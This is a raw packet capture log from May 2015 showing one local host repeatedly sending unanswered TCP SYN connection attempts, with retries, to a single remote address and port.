2015-05-19 22:43:48.788690 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….ie.6…..p…m………..
2015-05-19 22:44:02.790559 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.’@……..e…….i.’C=……………………
2015-05-19 22:44:05.790280 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.’C=……………………
2015-05-19 22:44:11.790842 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.4@……..e…….i.’C=….p……………
2015-05-19 22:44:25.792586 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.O@……..e…….i7………………………
2015-05-19 22:44:28.793449 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.T@……..e…….i7………………………
2015-05-19 22:44:34.794979 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.`@……..e…….i7…….p……………
2015-05-19 22:44:48.797759 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….~…e…….iQ..t……………………
2015-05-19 22:44:51.801565 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….S…e…….iQ..t……………………
2015-05-19 22:44:57.802119 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0 .@….\…e…….iQ..t….p……………
2015-05-19 22:45:11.804697 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4
.@….e…e…….i4…………Q…………..
2015-05-19 22:45:14.807720 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.<@……..e…….i4…………Q…………..
2015-05-19 22:45:20.811279 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.D@……..e…….i4…….p….Z……….
2015-05-19 22:45:34.809703 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….&…e…….i..d……….>…………..
2015-05-19 22:45:37.810893 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….#…e…….i..d……….>…………..
2015-05-19 22:45:43.812421 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i..d…..p….G……….
2015-05-19 22:45:57.814163 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….m…e…….i”..e……………………
2015-05-19 22:46:00.814028 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….i…e…….i”..e……………………
2015-05-19 22:46:06.814592 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.b@……..e…….i”..e….p…1………..
2015-05-19 22:46:20.815295 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.v@……..e…….i\..;……………………
2015-05-19 22:46:23.817191 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.x@……..e…….i\..;……………………
2015-05-19 22:46:29.808739 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i\..;….p……………
2015-05-19 22:46:43.811428 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i..+……….l…………..
2015-05-19 22:46:46.811311 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i..+……….l…………..
2015-05-19 22:46:52.817899 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i..+…..p….v……….
2015-05-19 22:47:06.819680 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….o…e…….i .b………r……………
2015-05-19 22:47:09.819480 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….i…e…….i .b………r……………
2015-05-19 22:47:15.820053 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….C…e…….i .b…..p……………
2015-05-19 22:47:29.821951 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.z@……..e…….i1.Lx……..xu…………..
2015-05-19 22:47:32.827188 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i1.Lx……..xu…………..
2015-05-19 22:47:38.822455 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i1.Lx….p….~……….
2015-05-19 22:47:52.827607 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….k…e…….i…………vr…………..
2015-05-19 22:47:55.831418 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i…………vr…………..
2015-05-19 22:48:01.827974 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i……..p….{……….
2015-05-19 22:48:15.832754 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.u@……..e…..r.i.C.
……..D[…………..
2015-05-19 22:48:18.920631 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…..r.i.C.
……..D[…………..
2015-05-19 22:48:24.918941 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.V@……..e…..r.i.C.
….p…Xd……….
2015-05-19 22:48:38.924242 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….8…e…….i..j}………Q…………..
2015-05-19 22:48:41.921826 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4. @….)…e…….i..j}………Q…………..
2015-05-19 22:48:47.915120 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.0@……..e…….i..j}….p….Z……….
2015-05-19 22:49:01.930685 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.)@…. …e…….iR.F………[……………
2015-05-19 22:49:04.926023 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.E@……..e…….iR.F………[……………
2015-05-19 22:49:10.929412 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.x@……..e…….iR.F…..p…o………..
2015-05-19 22:49:24.935696 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4#d@……..e…….i..@……….z…………..
2015-05-19 22:49:27.933360 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4&u@……..e…….i..@……….z…………..
2015-05-19 22:49:33.933646 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0).@….3…e…….i..@…..p……………
2015-05-19 22:49:47.937004 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.=@……..e…….ie.K3……..Do…………..
2015-05-19 22:49:50.929557 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….ie.K3……..Do…………..
2015-05-19 22:49:56.945920 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..00.@…~~…e…….ie.K3….p…Xx……….
2015-05-19 22:50:10.948522 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46,@…y….e…….i.Nc……….A…………..
2015-05-19 22:50:13.939347 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46.@…x….e…….i.Nc……….A…………..
2015-05-19 22:50:19.940906 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..07.@…wX…e…….i.Nc…..p….J……….
2015-05-19 22:50:33.942897 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..49.@…ui…e…….i23d………^……………
2015-05-19 22:50:36.944517 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..49.@…u^…e…….i23d………^……………
2015-05-19 22:50:42.950121 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0:M@…t….e…….i23d…..p…r………..
2015-05-19 22:50:56.947975 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=*@…r….e…….i………….^…………..
2015-05-19 22:50:59.947686 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=u@…q….e…….i………….^…………..
2015-05-19 22:51:05.947248 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…q….e…….i……..p….g……….
2015-05-19 22:51:19.948986 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…q….e…….i&.B……….m…………..
2015-05-19 22:51:22.949810 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…q}…e…….i&.B……….m…………..
2015-05-19 22:51:28.952353 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…qx…e…….i&.B…..p….v……….
2015-05-19 22:51:42.946366 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…qN…e…….ir………………………
2015-05-19 22:51:45.945957 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…qD…e…….ir………………………
2015-05-19 22:51:51.945492 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…q=…e…….ir…….p……………
2015-05-19 22:52:05.948015 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>?@…p….e…….i.?.%……..C……………
2015-05-19 22:52:08.949102 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>C@…p….e…….i.?.%……..C……………
2015-05-19 22:52:14.951656 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0>T@…p….e…….i.?.%….p…W………..
2015-05-19 22:52:28.955362 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…p….e…….i.#……….O@…………..
2015-05-19 22:52:31.955245 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…p….e…….i.#……….O@…………..
2015-05-19 22:52:37.955817 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0>.@…p….e…….i.#……p…cI……….
2015-05-19 22:52:51.947574 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…pD…e…….i.k……….2……………
2015-05-19 22:52:54.947382 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…pA…e…….i.k……….2……………
2015-05-19 22:53:00.947951 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…p4…e…….i.k……p…F………..
2015-05-19 22:53:14.949739 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?A@…o….e…….i………….n…………..
2015-05-19 22:53:17.951544 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?M@…o….e…….i………….n…………..
2015-05-19 22:53:23.958065 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?\@…o….e…….i……..p…/w……….
2015-05-19 22:53:37.958830 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o….e…….i..c…………………….
2015-05-19 22:53:40.957654 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o….e…….i..c…………………….
2015-05-19 22:53:46.952260 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o….e…….i..c…..p……………
2015-05-19 22:54:00.952060 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…or…e….. .iR..g……………………
2015-05-19 22:54:03.951812 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…on…e….. .iR..g……………………
2015-05-19 22:54:09.952363 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o_…e….. .iR..g….p……………
2015-05-19 22:54:23.954267 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o@…e…….i…)……..Y……………
2015-05-19 22:54:26.953971 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o;…e…….i…)……..Y……………
2015-05-19 22:54:32.954505 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o7…e…….i…)….p…m………..
2015-05-19 22:54:46.955253 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@.@…o#…e…….i .yh……..[……………
2015-05-19 22:54:49.962121 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@.@…o….e…….i .yh……..[……………
2015-05-19 22:54:55.962667 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0@#@…o….e…….i .yh….p…o’……….
2015-05-19 22:55:09.954406 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@2@…o….e…….i`1r………”……………
2015-05-19 22:55:12.955236 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@8@…n….e…….i`1r………”……………
2015-05-19 22:55:18.956803 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0@=@…n….e…….i`1r…..p…6………..
2015-05-19 22:55:32.956650 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@K@…n….e…….i.].r………<…………..
2015-05-19 22:55:35.964393 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@r@…n….e…….i.].r………<…………..
2015-05-19 22:55:41.959972 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0A.@…ml…e…….i.].r….p….E……….
2015-05-19 22:55:55.965645 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4C.@…k~…e…..5.i.e……………………..
2015-05-19 22:55:58.960530 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Eh@…i….e…..5.i.e……………………..
2015-05-19 22:56:04.963079 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0F.@…h….e…..5.i.e……p……………
2015-05-19 22:56:18.958807 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4I.@…f….e…..:.iz_……………………..
2015-05-19 22:56:21.958697 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4I.@…f….e…..:.iz_……………………..
2015-05-19 22:56:27.967248 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0I.@…e….e…..:.iz_……p……………
2015-05-19 22:56:41.962700 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Kv@…c….e…..=.i.6$…………………….
2015-05-19 22:56:44.962564 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4K.@…c….e…..=.i.6$…………………….
2015-05-19 22:56:50.963118 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0L.@…c’…e…..=.i.6$…..p…1………..
2015-05-19 22:57:04.974558 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M.@…b1…e…..>.i5.y………E\…………..
2015-05-19 22:57:07.973995 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M @…b)…e…..>.i5.y………E\…………..
2015-05-19 22:57:13.972242 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M.@…b….e…..>.i5.y…..p…Ye……….
2015-05-19 22:57:27.979634 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M+@…b….e…..A.i 2^………u……………
2015-05-19 22:57:30.979237 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M-@…b….e…..A.i 2^………u……………
2015-05-19 22:57:36.979777 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M>@…a….e…..A.i 2^…..p……………
2015-05-19 22:57:50.988501 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4MM@…a….e…..B.i7u………..C…………..
2015-05-19 22:57:53.992913 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4MQ@…a….e…..B.i7u………..C…………..
2015-05-19 22:57:59.995137 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M`@…a….e…..B.i7u……p….L……….
2015-05-19 22:58:14.000717 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Mp@…a….e…..C.i..1D……………………
2015-05-19 22:58:17.000851 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M{@…a….e…..C.i..1D……………………
2015-05-19 22:58:22.998067 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M.@…a….e…..C.i..1D….p……………
2015-05-19 22:58:37.007038 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4T.@…Zn…e…….i=…………*…………..
2015-05-19 22:58:40.004782 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Z-…e…….i=…………*…………..
2015-05-19 22:58:46.012994 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U6@…Z….e…….i=…….p….3……….
2015-05-19 22:59:00.011125 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Ur@…Y….e…….ii..”………k…………..
2015-05-19 22:59:03.010649 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U|@…Y….e…….ii..”………k…………..
2015-05-19 22:59:09.010899 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U.@…Y….e…….ii..”….p….t……….
2015-05-19 22:59:23.027431 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Y….e…….i…Q……………………
2015-05-19 22:59:26.028608 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Yz…e…….i…Q……………………
2015-05-19 22:59:32.038811 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U.@…Ym…e…….i…Q….p……………
2015-05-19 22:59:46.054163 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W0@…X….e…….i%..0……………………
2015-05-19 22:59:49.053842 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Z.@…U$…e…….i%..0……………………
2015-05-19 22:59:55.057099 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Z.@…T….e…….i%..0….p……………
2015-05-19 23:00:09.059766 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4\.@…S….e…….i..7…………………….
2015-05-19 23:00:12.068147 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4\.@…S….e…….i..7…………………….
2015-05-19 23:00:18.075364 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0\U@…R….e…….i..7…..p……………
2015-05-19 23:00:32.089231 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QC…e…….i.<v ……………………
2015-05-19 23:00:35.092161 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4^.@…Q’…e…….i.<v ……………………
2015-05-19 23:00:41.094465 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0^.@…P….e…….i.<v ….p……………
